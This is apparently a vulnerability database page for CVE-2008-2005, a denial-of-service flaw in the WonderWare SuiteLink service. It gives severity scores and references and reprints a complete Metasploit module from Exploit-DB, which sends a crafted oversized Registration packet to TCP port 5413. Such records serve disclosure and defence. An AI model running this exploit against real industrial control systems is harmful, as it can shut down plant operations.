CVE-2008-2005 : Detail

CVE-2008-2005

33.19%V4
Network
2008-05-06
13h00 +00:00
2018-10-11
17h57 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

The SuiteLink Service (aka slssvc.exe) in WonderWare SuiteLink before 2.0 Patch 01, as used in WonderWare InTouch 8.0, allows remote attackers to cause a denial of service (NULL pointer dereference and service shutdown) and possibly execute arbitrary code via a large length value in a Registration packet to TCP port 5413, which causes a memory allocation failure.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Metrics

Metrics Score Severity CVSS Vector Source
V2 5 AV:N/AC:L/Au:N/C:N/I:N/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 6474

Publication date : 2008-09-16 22h00 +00:00
Author : belay tows
EDB Verified : Yes

## # $Id: suitlink.rb $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' module Msf class Auxiliary::Dos::Windows::Wonderware::SuitLink < Msf::Auxiliary include Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, 'Name' => 'Wonderware SuitLink Denial of Service', 'Description' => %q{ This module exploits a denial of service vulnerability within the SuitLink service in Wonderware products. }, 'Author' => [ 'belay tows' ], 'License' => MSF_LICENSE, 'Version' => '$Revision: 1 $', 'References' => [ [ 'BID', '28974' ], [ 'CVE', '2008-2005' ], ], 'DisclosureDate' => 'May 05 2008')) register_options([Opt::RPORT(5413),], self.class) end def run connect print_status("Sending DoS packet...") dos_length = 0xBAADF00D pkt = "\xD5\xCF\xC7\xF8\x0B\xCD\xD3\x11\xAA\x10\x00\xA0\xC9\xEC\xFD\x9F" pkt << Rex::Text.rand_text_alpha(0x14) + "\x00\x00" pkt << [dos_length].pack("V") len = [pkt.length].pack("C") sock.put(len) sock.put(pkt) sleep 15 # wait to avoid thread shutdown event disconnect end end end # milw0rm.com [2008-09-17]

Products Mentioned

Configuraton 0

Wonderware>>Intouch >> Version 8.0

Wonderware>>Suitelink >> Version 2.0

    References

    http://www.kb.cert.org/vuls/id/596268
    Tags : third-party-advisory, x_refsource_CERT-VN
    http://www.securityfocus.com/bid/28974
    Tags : vdb-entry, x_refsource_BID
    https://www.exploit-db.com/exploits/6474
    Tags : exploit, x_refsource_EXPLOIT-DB
    http://www.securitytracker.com/id?1019966
    Tags : vdb-entry, x_refsource_SECTRACK
    http://secunia.com/advisories/30063
    Tags : third-party-advisory, x_refsource_SECUNIA